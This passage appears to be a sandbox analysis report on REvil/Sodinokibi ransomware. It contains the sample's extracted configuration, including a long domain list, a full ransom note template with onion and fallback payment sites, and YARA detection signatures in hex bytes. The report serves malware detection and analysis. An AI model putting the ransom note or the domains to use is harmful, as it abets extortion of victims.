r;witraz.pl;karelinjames.com;finnergo.eu;dr-vita.de;parseport.com;jayfurnitureco.com;transifer.fr;thegrinningmanmusical.com;achetrabalhos.com;thesilkroadny.com;memphishealthandwellness.com;skooppi.fi;circlecitydj.com;bodet150ans.com;midwestschool.org;springfieldplumbermo.com;augen-praxisklinik-rostock.de;taulunkartano.fi;unexplored.gr;silverbird.dk;speakaudible.com;theboardroomafrica.com;lgiwines.com;cesep2019.com;lovcase.com;alaskaremote.com;kvetymichalovce.sk;trevi-vl.ru;casinodepositors.com;koncept-m.ru;angeleyezstripclub.com;liveyourheartout.co;vapiano.fr;towelroot.co;solidhosting.nl;hom-frisor.dk;projektparkiet.pl;masecologicos.com;baita.ac;juergenblaetz.de;veggienessa.com;startuplive.org;inewsstar.com;jaaphoekzema.nl;girlish.ae;fixx-repair.com;bmw-i-pure-impulse.com;pokemonturkiye.com;edvestors.org;bjornvanvulpen.nl;nginx.com;yourhappyevents.fr;ddmgen.com;boloria.de;molade.nl;lagschools.ng;nvisionsigns.com;bluetenreich-brilon.de;buffdaddyblog.com;entdoctor-durban.com;bellesiniacademy.org;mazzaropi.com.br;bychowo.pl;kryptos72.com;awaitspain.com;forumsittard.nl;mensemetgesigte.co.za;weddingceremonieswithtim.com;agendatwentytwenty.com;barbaramcfadyenjewelry.com;smarttourism.academy;jglconsultancy.com;sachainchiuk.com;schlagbohrmaschinetests.com;daveystownhouse.com;krishnabrawijaya.com;imajyuku-sozoku.com;clemenfoto.dk;kombi-dress.com;agrifarm.dk;rizplakatjaya.com;laaisterplakky.nl;cac2040.com;turing.academy;qandmmusiccenter.com;envomask.com;housesofwa.com;wasnederland.nl;hepishopping.com;hm-com.com;nevadaruralhousingstudies.org;teamsegeln.ch;bcabattoirs.org;christianscholz.de;buerocenter-butzbach-werbemittel.de;oncarrot.com;walterman.es;scentedlair.com;alene.co;cc-experts.de;sweetz.fr;irizar.com;unislaw-narty.pl;palema.gr;atma.nl;thenalpa.com;qwikcoach.com;arearugcleaningnyc.com;cincinnatiphotocompany.org;blucamp.com;fanuli.com.au;heimdalbygg.no;evsynthacademy.org;finsahome.co.uk;dnqa.co.uk;comoserescritor.com;techybash.com;parisschool.ru;singletonfinancial.com;ziliak.com;limmortelyouth.com;bertbutter.nl;hawthornsretirement.co.uk;albcleaner.fr;etgdogz.de;acb-gruppe.ch;larchwoodmarketing.com;tothebackofthemoon.com;kelsigordon.com;tradenavigator.ch;jobkiwi.com.ng;arthakapitalforvaltning.dk;switch-made.com;mneti.ru;atrgroup.it;eventosvirtualesexitosos.com;eos-horlogerie.com;gardenpartner.pl;kookooo.com;heuvelland-oaze.nl;domilivefurniture.com;computer-place.de;stralsund-ansichten.de;carolynfriedlander.com;charlesfrancis.photos;5pointpt.com;sunsolutions.es;shortsalemap.com;ceocenters.com;plbinsurance.com;martinipstudios.com;chorusconsulting.net;internalresults.com;mariajosediazdemera.com;werkzeugtrolley.net;electricianul.com;tweedekansenloket.nl;chinowarehousespace.com;cmeow.com;hawaiisteelbuilding.com;volta.plus;theatre-embellie.fr;zumrutkuyutemel.com;ingresosextras.online;diakonie-weitramsdorf-sesslach.de;web865.com;alwaysdc.com;kemtron.fr;malzomattalar.com;drvoip.com;aidanpublishing.co.uk;sppdstats.com;gbk-tp1.de;omegamarbella.com;ya-elka.ru;lookandseen.com;ufovidmag.com;jameswilliamspainting.com;rivermusic.nl;amorbellezaysalud.com;paardcentraal.nl;bohrlochversicherung.info;brannbornfastigheter.se;precisetemp.com;schluesseldienste-hannover.de;powershell.su;awag-blog.de;monstarrsoccer.com;speiserei-hannover.de;enews-qca.com;klapanvent.ru;kosten-vochtbestrijding.be;voice2biz.com;geoweb.software;lattalvor.com;mac-computer-support-hamburg.de;scietech.academy;rechtenplicht.be;qrs-international.com;nexstagefinancial.com;tesisatonarim.com;bumbipdeco.site;harleystreetspineclinic.com;latableacrepes-meaux.fr;publicompserver.de;billyoart.com;mrkluttz.com;ikzoekgod.be;onlinetvgroup.com;haus-landliebe.de;silkeight.com;curtsdiscountguns.com;premier-iowa.com;furland.ru;campinglaforetdetesse.com;yayasanprimaunggul.org;bavovrienden.nl;sellthewrightway.com;tramadolhealth.com;elliemaccreative.wordpress.com;rino-gmbh.com;imaginekithomes.co.nz;linearete.com;zaczytana.com;cainlaw-okc.com;cxcompany.com;myplaywin3.com;condormobile.fr;annida.it;sytzedevries.com;bagaholics.in;jmmartinezilustrador.com;fbmagazine.ru;ramirezprono.com;kompresory-opravy.com;ketomealprep.academy;kenmccallum.com;block-optic.com;vitormmcosta.com;breakluckrecords.com;lovetzuchia.com;campusescalade.com;janellrardon.com;rarefoods.ro;ziliak.com;egpu.fr;latteswithleslie.com;utilisacteur.fr;smartmind.net;fysiotherapierijnmond.nl;penumbuhrambutkeiskei.com;topvijesti.net;lyricalduniya.com;k-v-f.de;ravage-webzine.nl;baumfinancialservices.com;tanatek.com;muni.pe;mike.matthies.de;rvside.com;hvitfeldt.dk;hartofurniture.com;wg-heiligenstadt.de;der-stempelking.de;andreaskildegaard.dk;collegetennis.info;dierenambulancealkmaar.nl;centuryvisionglobal.com;mgimalta.com;valiant-voice.com;burg-zelem.de;strauchs-wanderlust.info;pureelements.nl;apmollerpension.com;n-newmedia.de;amyandzac.com;animalfood-online.de;cuadc.org;uci-france.fr;istantidigitali.com;teethinadaydentalimplants.com;nationnewsroom.com;otpusk.zp.ua;galaniuklaw.com;hekecrm.com;sbit.ag;spirello.nl;perceptdecor.com;hnkns.com;zuerich-umzug.ch;renderbox.ch;bcmets.info;hospitalitytrainingsolutions.co.uk;mindsparkescape.com;xn--80abehgab4ak0ddz.xn--p1ai;devplus.be;lollachiro.com;olry-cloisons.fr;line-x.co.uk;alpesiberie.com;reputation-medical.online;grafikstudio-visuell.de;watchsale.biz;k-zubki.ru;rokthetalk.com;jefersonalessandro.com;wyreforest.net;sber-biznes.com;haard-totaal.nl;christopherhannan.com;lidkopingsnytt.nu;aceroprime.com;mbuildinghomes.com;cotton-avenue.co.il;skolaprome.eu;framemyballs.com;catering.com;wirmuessenreden.com;blavait.fr;mayprogulka.ru;andrealuchesi.it;diverfiestas.com.es;die-immo-agentur.de;stoneridgemontessori.com;moira-cristescu.com;humanviruses.org;littlesaints.academy;neolaiamedispa.com;placermonticello.com;cp-bap.de;selected-minds.de;coachpreneuracademy.com;aslog.fr;mahikuchen.com;magnetvisual.com;vipcarrental.ae;mundo-pieces-auto.fr;belinda.af;nepressurecleaning.com;fridakids.com;goodboyscustom.com;protoplay.ca;janmorgenstern.com;yuanshenghotel.com;askstaffing.com;wallflowersandrakes.com;creohn.de;apogeeconseils.fr;fskhjalmar.se;leopoldineroux.com;pinthelook.com;xn--ziinoapte-6ld.ro;zwemofficial.nl;redctei.co;sambaglow.com;topautoinsurers.net;tatyanakopieva.ru;bonitabeachassociation.com;brinkdoepke.eu;so-sage.fr;hutchstyle.co.uk;ncjc.ca;tzn.nu;concontactodirecto.com;aoyama.ac;xtensifi.com;ruggestar.ch;slotspinner.com;breathebettertolivebetter.com;dibli.store;ebible.co;gratiocafeblog.wordpress.com;thiagoperez.com;pilotgreen.com;kausette.com;aberdeenartwalk.org;ownidentity.com;spacebel.be;pazarspor.org.tr;factorywizuk.com;professionetata.com;groovedealers.ru;agora-collectivites.com;rs-danmark.dk;poems-for-the-soul.ch;craftron.com;eatyoveges.com;jakubrybak.com;craftingalegacy.com;aheadloftladders.co.uk;oththukaruva.com;nutriwell.com.sg;energosbit-rp.ru;oraweb.net;mariamalmahdi.com;thegetawaycollective.com;charlottelhanna.com;markseymourphotography.co.uk;leatherjees.com;happylublog.wordpress.com;bulyginnikitav.000webhostapp.com;fidelitytitleoregon.com;osn.ro;studionumerik.fr;cops4causes.org;phukienbepthanhdat.com;beandrivingschool.com.au;chatterchatterchatter.com;bluelakevision.com;mustangmarketinggroup.com;rentingwell.com;biodentify.ai;texanscan.org;landgoedspica.nl;digitale-elite.de;stagefxinc.com;physio-lang.de;jollity.hu;liverpoolabudhabi.ae;logosindustries.com;citydogslife.com;metriplica.academy;a-zpaperwork.eu;andermattswisswatches.ch;jandhpest.com;greenrider.nl;brighthillgroup.com;fotoslubna.com;yvesdoin-aquarelles.fr;mariannelemenestrel.com;airvapourbarrier.com;reizenmetkinderen.be;clinic-beethovenstrasse-ag.ch;rapid5kloan.org;mazift.dk;rolleepollee.com;denhaagfoodie.nl;lesyeuxbleus.net;khtrx.com;richardkershawwines.co.za;rishigangoly.com;apiarista.de;goeppinger-teppichreinigung.de;dreamvoiceclub.org;metcalfe.ca;sycamoregreenapts.com;alharsunindo.com;legundschiess.de;thisprettyhair.com;parentsandkids.com;edrickennedymacfoy.com;elex.is;encounter-p.net;thepixelfairy.com;mediogiro.com.ar;limounie.com;birthplacemag.com;alnectus.com;billigeflybilletter.dk;fi-institutionalfunds.com;distrifresh.com;luvinsburger.fr;kamin-somnium.de;glennverschueren.be;elitkeramika-shop.com.ua;saboboxtel.uk;innersurrection.com;alisodentalcare.com;galatee-couture.com;ciga-france.fr;hostingbangladesh.net;domaine-des-pothiers.com;hostastay.com;ox-home.com;skidpiping.de;shrinkingplanet.com;michal-s.co.il;basindentistry.com;baptistdistinctives.org;premiumweb.com.ua:443;letterscan.de;levencovka.ru;fsbforsale.com;imagine-entertainment.com;medicalsupportco.com;explora.nl;lisa-poncon.fr;louiedager.com;johnstonmingmanning.com;narca.net;kuriero.pro;peninggibadan.co.id;craftstone.co.nz;kiraribeaute-nani.com;eyedoctordallas.com;laylavalentine.com;newonestop.com;guohedd.com;thehovecounsellingpractice.co.uk;epsondriversforwindows.com;mamajenedesigns.com;acumenconsultingcompany.com;animation-pro.co.uk;avis.mantova.it;babysitting-hk.helpergo.co;worldproskitour.com;morgansconsult.com;hypogenforensic.com;alabamaroofingllc.com;arabianmice.com;cap29010.it;bringmehope.org;signamedia.de;riffenmattgarage.ch;opt4cdi.com;aciscomputers.com;pubcon.com;agencewho-aixenprovence.fr;promus.ca;dentallabor-luenen.de;schulz-moelln.de;jimprattmediations.com;mesajjongeren.nl;bajova.sk;spartamovers.com;martha-frets-ceramics.nl;epicjapanart.com;go.labibini.ch;raeoflightmusic.com;pankiss.ru;bruut.online;encounter-p.net;photonag.com;nourella.com;licensed-public-adjuster.com;boomerslivinglively.com;autoteamlast.de;leloupblanc.gr;adterium.com;ronielyn.com;devus.de;9nar.com;bakingismyyoga.com;cymru.futbol;randyabrown.com;biketruck.de;ivancacu.com;geitoniatonaggelon.gr;mikegoodfellow.co.uk;sarahspics.co.uk;belofloripa.be;neonodi.be;ocduiblog.com;santastoy.store;cssp-mediation.org;smartworkplaza.com;katherinealy.com;ludoil.it;jdscenter.com;sharonalbrightdds.com;fire-space.com;saberconcrete.com;letsstopsmoking.co.uk;whoopingcrane.com;ruggestar.ch;iactechnologies.net;5thactors.com;internestdigital.com;glas-kuck.de;jeanmonti.com;ziliak.com;golfclublandgoednieuwkerk.nl;nauticmarine.dk;fluzfluzrewards.com;t3brothers.com;jobstomoveamerica.org;forskolinslimeffect.net;nuohous.com;anleggsregisteret.no;dcc-eu.com;keuken-prijs.nl;opticahubertruiz.com;brownswoodblog.com;fta-media.com;pro-gamer.pl;ced-elec.com;mindfuelers.com;endstarvation.com;tastevirginia.com;stabilisateur.fr;b3b.ch;triplettagaite.fr;factoriareloj.com;global-migrate.com;ronaldhendriks.nl;jonnyhooley.com;soundseeing.net;yournextshoes.com;kickittickets.com;dantreranch.com;scotlandsroute66.co.uk;oportowebdesign.com;motocrosshideout.com;aquacheck.co.za;theater-lueneburg.de;adaduga.info;production-stills.co.uk;rossomattonecase.it;kryddersnapsen.dk;linkbuilding.life;gosouldeep.com;denverwynkoopdentist.com;verbouwingsdouche.nl;lapponiasafaris.com;tutvracks.com;agriturismocastagneto.it;rozmata.com;paprikapod.com;lmmont.sk;makingmillionaires.net;acornishstudio.co.uk;corporacionrr.com;orchardbrickwork.com;from02pro.com;cookinn.nl;the-cupboard.co.uk;interlinkone.com;liepertgrafikweb.at;simpleitsolutions.ch;campusce.com;gurutechnologies.net;tellthebell.website;uncensoredhentaigif.com;nepal-pictures.com;rtc24.com;oro.ae;initconf.com;zinnystar.com;ledyoucan.com;slideevents.be;anchelor.com;pharmeko-group.com;citiscapes-art.com;dayenne-styling.nl;tbalp.co.uk;nxtstg.org;astrographic.com;nieuwsindeklas.be;pisofare.co;advancedeyecare.com;pajagus.fr;mediahub.co.nz;donau-guides.eu;g2mediainc.com;sprintcoach.com;dinedrinkdetroit.com;radishallgood.com;palmenhaus-erfurt.de;jlgraphisme.fr;lassocrm.com;netadultere.fr;mrmac.com;renehartman.nl;graygreenbiomedservices.com;berdonllp.com;globalcompliancenews.com;sololibrerie.it;auberives-sur-vareze.fr;eastgrinsteadwingchun.com;livelai.com;napisat-pismo-gubernatoru.ru:443;fitnessblenderstory.com;expohomes.com;mjk.digital;2020hindsight.info;cyberpromote.de;hensleymarketing.com;innovationgames-brabant.nl;artcase.pl;stathmoulis.gr;mediabolmong.com;kellengatton.com;ncn.nl;3daywebs.com;cleanroomequipment.ie;nalliasmali.net;advesa.com;buzzneakers.com;handyman-silkeborg.dk;billscars.net;catalyseurdetransformation.com;espaciopolitica.com;gatlinburgcottage.com;ninjaki.com;delegationhub.com;nrgvalue.com;focuskontur.com;nykfdyrehospital.dk;skyboundnutrition.co.uk;asiaartgallery.jp;wrinstitute.org;itheroes.dk;jalkapuu.net;amco.net.au;phoenixcrane.com;csaballoons.com;smartercashsystem.com;dentalcircle.com;trainiumacademy.com;operativadigital.com;tages-geldvergleich.de;blueridgeheritage.com;polynine.com;kristianboennelykke.dk;eafx.pro;victorvictoria.com;noda.com.ua;awaisghauri.com;bendel-partner.de;pixelhealth.net;janasfokus.com;goodherbalhealth.com;universelle.fr;eshop.design;endlessrealms.net;brisbaneosteopathic.com.au;secrets-clubs.co.uk;stressreliefadvice.com;sealgrinderpt.com;jag.me;suonenjoen.fi;mrcar.nl;antesacademy.it;mind2muscle.nl;1deals.com;ayudaespiritualtamara.com;alcye.com;advance-refle.com;profibersan.com;tetameble.pl;broccolisoep.nl;direitapernambuco.com;kerstliedjeszingen.nl;cardsandloyalty.com;sshomme.com;p-ride.live;ideamode.com;ygallerysalonsoho.com:443;fazagostar.co;scholarquotes.com;claudiakilian.de;karmeliterviertel.com;patriotcleaning.net;bescomedical.de;mercadodelrio.com", "net": true, "nbody": "---=== Welcome. Again. ===---\r\n\r\n[+] Whats Happen? [+]\r\n\r\nYour files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion {EXT}.\r\nBy the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).\r\n\r\n[+] What guarantees? [+]\r\n\r\nIts just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.\r\nTo check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.\r\nIf you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money.\r\n\r\n[+] How to get access on website? [+]\r\n\r\nYou have two ways:\r\n\r\n1) [Recommended] Using a TOR browser!\r\n  a) Download and install TOR browser from this site: https://torproject.org/\r\n  b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}\r\n\r\n2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:\r\n  a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)\r\n  b) Open our secondary website: http://decryptor.top/{UID}\r\n\r\nWarning: secondary website can be blocked, thats why first variant much better and more available.\r\n\r\nWhen you open our website, put the following data in the input form:\r\nKey:\r\n\r\n{KEY}\r\n\r\n\r\nExtension name:\r\n\r\n{EXT}\r\n\r\n-----------------------------------------------------------------------------------------\r\n\r\n!!! DANGER !!!\r\nDONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data.\r\n!!! !!! !!!\r\nONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.\r\n!!! !!! !!!\u0000", "nname": "{EXT}-readme.txt", "exp": true, "img": "QQBsAGwAIABvAGYAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAhAA0ACgANAAoARgBpAG4AZAAgAHsARQBYAFQAfQAtAHIAZQBhAGQAbQBlAC4AdAB4AHQAIABhAG4AZAAgAGYAbwBsAGwAbwB3ACAAaQBuAHMAdAB1AGMAdABpAG8AbgBzAAAA"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
myfile.exe	JoeSecurity_Revil	Yara detected Revil	Joe Security
myfile.exe	Windows_Ransomware_Sodinokibi_83f05fbe	Identifies SODINOKIBI/REvil ransomware	unknown	0x85ab:$d1: 03 C0 01 47 30 11 4F 34 01 57 30 8B 57 78 8B C2 11 77 34 8B 77 7C 8B CE 0F A4 C1 04 C1 E0 04 01 47 28 8B C2 11 4F 2C 8B CE 0F A4 C1 01 03 C0 01 47 28 11 4F 2C 01 57 28 8B 57 70 8B C2 11 77 2C ... 0x17540:$d2: 65 78 70 61 6E 64 20 33 32 2D 62 79 74 65 20 6B 65 78 70 61 6E 64 20 31 36 2D 62 79 74 65 20 6B 0x82e5:$d3: F7 6F 38 03 C8 8B 43 48 13 F2 F7 6F 20 03 C8 8B 43 38 13 F2 F7 6F 30 03 C8 8B 43 40 13 F2 F7 6F 28 03 C8 8B 43 28 13 F2 F7 6F 40 03 C8 8B 45 08 13 F2 89 48 68 89 70 6C 8B 43 38 F7 6F 38 8B C8 ... 0x926a:$d4: 33 C0 8B 5A 68 8B 52 6C 0F A4 FE 08 C1 E9 18 0B C6 C1 E7 08 8B 75 08 0B CF 89 4E 68 8B CA 89 46 6C 33 C0 8B 7E 60 8B 76 64 0F A4 DA 19 C1 E9 07 0B C2 C1 E3 19 8B 55 08 0B CB 89 4A 60 8B CF 89 ... 0x8f8b:$d5: C1 01 C1 EE 1F 0B D1 03 C0 0B F0 8B C2 33 43 24 8B CE 33 4B 20 33 4D E4 33 45 E0 89 4B 20 8B CB 8B 5D E0 89 41 24 8B CE 33 4D E4 8B C2 31 4F 48 33 C3 8B CF 31 41 4C 8B C7 8B CE 33 48 70 8B C2 ... 0x8160:$d6: 8B 43 40 F7 6F 08 03 C8 8B 03 13 F2 F7 6F 48 03 C8 8B 43 48 13 F2 F7 2F 03 C8 8B 43 08 13 F2 F7 6F 40 03 C8 8B 43 30 13 F2 F7 6F 18 03 C8 8B 43 18 13 F2 F7 6F 30 03 C8 8B 43 38 13 F2 F7 6F 10 ... 0x8ef8:$d7: 8B CE 33 4D F8 8B C2 33 C3 31 4F 18 8B CF 31 41 1C 8B C7 8B CE 33 48 40 8B C2 33 4D F8 33 47 44 89 4F 40 33 C3 8B CF 89 41 44 8B C7 8B CE 33 48 68 8B C2 33 47 6C 33 4D F8 33 C3 89 4F 68 8B CF ... 0x1a000:$d8: 36 7D 49 30 85 35 C2 C3 68 60 4B 4B 7A BE 83 53 AB E6 8E 42 F9 C6 62 A5 D0 6A AD C6 F1 7D F6 1D 79 CD 20 FC E7 3E E1 B8 1A 43 38 12 C1 56 28 1A 04 C9 22 55 E0 D7 08 BB 9F 0B 1F 1C B9 13 06 35 0x935b:$d9: C2 C1 EE 03 8B 55 08 0B CE 89 4A 4C 8B CF 89 42 48 33 C0 8B 72 30 8B 52 34 C1 E9 0C 0F A4 DF 14 0B C7 C1 E3 14 8B 7D 08 0B CB 89 4F 30 8B CE 89 47 34 33 C0 C1 E1 0C 0F AC D6 14 0B C6 C1 EA 14 ... 0x828b:$d10: 8B F2 8B 43 38 F7 6F 28 03 C8 8B 43 18 13 F2 F7 6F 48 03 C8 8B 43 28 13 F2 F7 6F 38 03 C8 8B 43 40 13 F2 F7 6F 20 0F A4 CE 01 03 C9 03 C8 8B 43 20 13 F2 F7 6F 40 03 C8 8B 43 30 13 F2 F7 6F 30 ... 0x8d54:$d11: 33 45 FC 31 4B 28 8B CB 31 41 2C 8B CE 8B C3 33 48 50 8B C2 33 43 54 33 CF 33 45 FC 89 4B 50 8B CB 89 41 54 8B CE 8B C3 33 48 78 8B C2 33 43 7C 33 CF 33 45 FC 89 4B 78 8B CB 89 41 7C 33 B1 A0 0x91d4:$d12: 52 24 0F A4 FE 0E C1 E9 12 0B C6 C1 E7 0E 8B 75 08 0B CF 89 4E 20 8B CA 89 46 24 33 C0 8B 7E 78 8B 76 7C 0F A4 DA 1B C1 E9 05 0B C2 C1 E3 1B 8B 55 08 0B CB 89 4A 78 8B CF 89 42 7C 33 C0 8B 9A 0x8233:$d13: F2 8B 43 38 F7 6F 20 03 C8 8B 43 40 13 F2 F7 6F 18 03 C8 8B 43 10 13 F2 F7 6F 48 03 C8 8B 43 28 13 F2 F7 6F 30 03 C8 8B 43 20 13 F2 F7 6F 38 03 C8 8B 43 30 13 F2 F7 6F 28 03 C8 8B 43 48 13 F2 0x89a6:$d14: 8B 47 30 13 F2 F7 6F 40 03 C8 13 F2 0F A4 CE 01 89 73 74 03 C9 89 4B 70 8B 47 30 F7 6F 48 8B C8 8B F2 8B 47 38 F7 6F 40 03 C8 13 F2 0F A4 CE 01 89 73 7C 03 C9 89 4B 78 8B 47 38 F7 6F 48 8B C8
myfile.exe	Windows_Ransomware_Sodinokibi_a282ba44	Identifies SODINOKIBI/REvil ransomware	unknown	0x3e99:$c3: 75 0C 72 D3 33 C0 40 5F 5E 5B 8B E5 5D C3 33 C0 EB F5 55 8B EC 83 0x4a65:$c4: 0C 8B 04 B0 83 78 04 05 75 1C FF 70 08 FF 70 0C FF 75 0C FF 0x5c13:$c5: FB 8B 45 FC 50 8B 08 FF 51 08 5E 8B C7 5F 5B 8B E5 5D C3 55 0x8f7b:$c6: BC 00 00 00 33 D2 8B 4D F4 8B F1 8B 45 F0 0F A4 C1 01 C1 EE 1F 0x957d:$c7: 54 8B CE F7 D1 8B C2 23 4D DC F7 D0 33 4D F4 23 C7 33 45 E8 89 0xa615:$c8: 0C 89 46 0C 85 C0 75 2A 33 C0 EB 6C 8B 46 08 85 C0 74 62 6B
myfile.exe	REvil	REvil Payload	R3MRUM	0x17540:$RE1: expand 32-byte kexpand 16-byte k 0xbc30:$RE2: sysshadow 0x107f8:$RE2: sysshadow 0x14470:$RE2: sysshadow 0xbc50:$RE3: SCROLLBAR 0x10810:$RE3: SCROLLBAR 0x14488:$RE3: SCROLLBAR 0xbc40:$RE4: msctfime ui 0x10804:$RE4: msctfime ui 0x1447c:$RE4: msctfime ui 0xbc60:$RE5: \BaseNamedObjects\%S 0x1081c:$RE5: \BaseNamedObjects\%S 0x14494:$RE5: \BaseNamedObjects\%S 0x4e1d:$decode: 33 D2 8A 9C 3D FC FE FF FF 8B C7 0F B6 CB F7 75 0C 8B 45 08 0F B6 04 02 03 C6 03 C8 0F B6 F1 8A 84 35 FC FE FF FF 88 84 3D FC FE FF FF 47 88 9C 35 FC FE FF FF 81 FF 00 01 00 00 72 C3
myfile.exe	Win32_Ransomware_Revil	unknown	ReversingLabs	0x5699:$search_files: 55 8B EC 81 EC 68 02 00 00 53 56 8B 75 08 33 C0 57 8B 7D 0C 8B D8 50 56 89 45 F4 89 5D F0 89 45 F8 89 45 FC FF 57 04 59 59 85 C0 0F 84 AC 01 00 00 8D 45 F0 56 50 E8 B7 02 00 00 53 56 FF 77 0C ... 0x5c26:$remote_connection: 55 8B EC 81 EC 5C 01 00 00 56 57 8D 85 A4 FE FF FF 50 68 90 00 00 00 6A 04 68 E7 04 00 00 68 28 CC 41 00 E8 B5 E5 FF FF 83 C4 14 33 F6 33 C0 66 89 85 34 FF FF FF 8D 85 A4 FE FF FF 56 56 56 56 ... 0x1ca9:$encrypt_files: 55 8B EC 51 83 7D 14 00 53 56 57 BB 00 00 10 00 7F 0A 7C 05 39 5D 10 73 03 8B 5D 10 8B 7D 08 8D 83 58 01 00 00 50 57 E8 9A 38 00 00 59 59 EB 21 E8 AA 1C 00 00 83 F8 08 75 2F 6A 64 E8 6A 20 00 ... 0x5a7a:$enum_resources: 55 8B EC 83 EC 10 8D 45 F8 50 FF 75 0C 6A 00 6A 01 6A 02 FF 15 48 CB 41 00 85 C0 74 07 33 C0 E9 9D 00 00 00 83 4D FC FF B8 00 40 00 00 57 50 89 45 F4 E8 6D D5 FF FF 8B F8 59 85 FF 75 0D FF 75 ...

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp	Windows_Ransomware_Sodinokibi_a282ba44	Identifies SODINOKIBI/REvil ransomware	unknown	0x3a99:$c3: 75 0C 72 D3 33 C0 40 5F 5E 5B 8B E5 5D C3 33 C0 EB F5 55 8B EC 83 0x4665:$c4: 0C 8B 04 B0 83 78 04 05 75 1C FF 70 08 FF 70 0C FF 75 0C FF 0x5813:$c5: FB 8B 45 FC 50 8B 08 FF 51 08 5E 8B C7 5F 5B 8B E5 5D C3 55 0x8b7b:$c6: BC 00 00 00 33 D2 8B 4D F4 8B F1 8B 45 F0 0F A4 C1 01 C1 EE 1F 0x917d:$c7: 54 8B CE F7 D1 8B C2 23 4D DC F7 D0 33 4D F4 23 C7 33 45 E8 89 0xa215:$c8: 0C 89 46 0C 85 C0 75 2A 33 C0 EB 6C 8B 46 08 85 C0 74 62 6B
00000000.00000000.1647049931.0000000000271000.00000020.00000001.01000000.00000003.sdmp	Windows_Ransomware_Sodinokibi_a282ba44	Identifies SODINOKIBI/REvil ransomware	unknown	0x3a99:$c3: 75 0C 72 D3 33 C0 40 5F 5E 5B 8B E5 5D C3 33 C0 EB F5 55 8B EC 83 0x4665:$c4: 0C 8B 04 B0 83 78 04 05 75 1C FF 70 08 FF 70 0C FF 75 0C FF 0x5813:$c5: FB 8B 45 FC 50 8B 08 FF 51 08 5E 8B C7 5F 5B 8B E5 5D C3 55 0x8b7b:$c6: BC 00 00 00 33 D2 8B 4D F4 8B F1 8B 45 F0 0F A4 C1 01 C1 EE 1F 0x917d:$c7: 54 8B CE F7 D1 8B C2 23 4D DC F7 D0 33 4D F4 23 C7 33 45 E8 89 0xa215:$c8: 0C 89 46 0C 85 C0 75 2A 33 C0 EB 6C 8B 46 08 85 C0 74 62 6B
Process Memory Space: myfile.exe PID: 7156	JoeSecurity_Ransomware_Generic	Yara detected Ransomware_Generic	Joe Security
Process Memory Space: myfile.exe PID: 7156	JoeSecurity_Chaos	Yara detected Chaos Ransomware	Joe Security
Process Memory Space: myfile.exe PID: 7156	JoeSecurity_PythonRansomware	Yara detected Python Ransomware	Joe Security
Process Memory Space: myfile.exe PID: 7156	JoeSecurity_Netwalker	Yara detected Netwalker ransomware	Joe Security
Process Memory Space: myfile.exe PID: 7156	JoeSecurity_Sodinokibi	Yara detected Sodinokibi Ransomware	Joe Security
Process Memory Space: myfile.exe PID: 7156	JoeSecurity_TrojanRansom	Yara detected TrojanRansom	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.myfile.exe.270000.0.unpack	JoeSecurity_Revil	Yara detected Revil	Joe Security
0.0.myfile.exe.270000.0.unpack	Windows_Ransomware_Sodinokibi_83f05fbe	Identifies SODINOKIBI/REvil ransomware	unknown	0x85ab:$d1: 03 C0 01 47 30 11 4F 34 01 57 30 8B 57 78 8B C2 11 77 34 8B 77 7C 8B CE 0F A4 C1 04 C1 E0 04 01 47 28 8B C2 11 4F 2C 8B CE 0F A4 C1 01 03 C0 01 47 28 11 4F 2C 01 57 28 8B 57 70 8B C2 11 77 2C ... 0x17540:$d2: 65 78 70 61 6E 64 20 33 32 2D 62 79 74 65 20 6B 65 78 70 61 6E 64 20 31 36 2D 62 79 74 65 20 6B 0x82e5:$d3: F7 6F 38 03 C8 8B 43 48 13 F2 F7 6F 20 03 C8 8B 43 38 13 F2 F7 6F 30 03 C8 8B 43 40 13 F2 F7 6F 28 03 C8 8B 43 28 13 F2 F7 6F 40 03 C8 8B 45 08 13 F2 89 48 68 89 70 6C 8B 43 38 F7 6F 38 8B C8 ... 0x926a:$d4: 33 C0 8B 5A 68 8B 52 6C 0F A4 FE 08 C1 E9 18 0B C6 C1 E7 08 8B 75 08 0B CF 89 4E 68 8B CA 89 46 6C 33 C0 8B 7E 60 8B 76 64 0F A4 DA 19 C1 E9 07 0B C2 C1 E3 19 8B 55 08 0B CB 89 4A 60 8B CF 89 ... 0x8f8b:$d5: C1 01 C1 EE 1F 0B D1 03 C0 0B F0 8B C2 33 43 24 8B CE 33 4B 20 33 4D E4 33 45 E0 89 4B 20 8B CB 8B 5D E0 89 41 24 8B CE 33 4D E4 8B C2 31 4F 48 33 C3 8B CF 31 41 4C 8B C7 8B CE 33 48 70 8B C2 ... 0x8160:$d6: 8B 43 40 F7 6F 08 03 C8 8B 03 13 F2 F7 6F 48 03 C8 8B 43 48 13 F2 F7 2F 03 C8 8B 43 08 13 F2 F7 6F 40 03 C8 8B 43 30 13 F2 F7 6F 18 03 C8 8B 43 18 13 F2 F7 6F 30 03 C8 8B 43 38 13 F2 F7 6F 10 ... 0x8ef8:$d7: 8B CE 33 4D F8 8B C2 33 C3 31 4F 18 8B CF 31 41 1C 8B C7 8B CE 33 48 40 8B C2 33 4D F8 33 47 44 89 4F 40 33 C3 8B CF 89 41 44 8B C7 8B CE 33 48 68 8B C2 33 47 6C 33 4D F8 33 C3 89 4F 68 8B CF ... 0x1a000:$d8: 36 7D 49 30 85 35 C2 C3 68 60 4B 4B 7A BE 83 53 AB E6 8E 42 F9 C6 62 A5 D0 6A AD C6 F1 7D F6 1D 79 CD 20 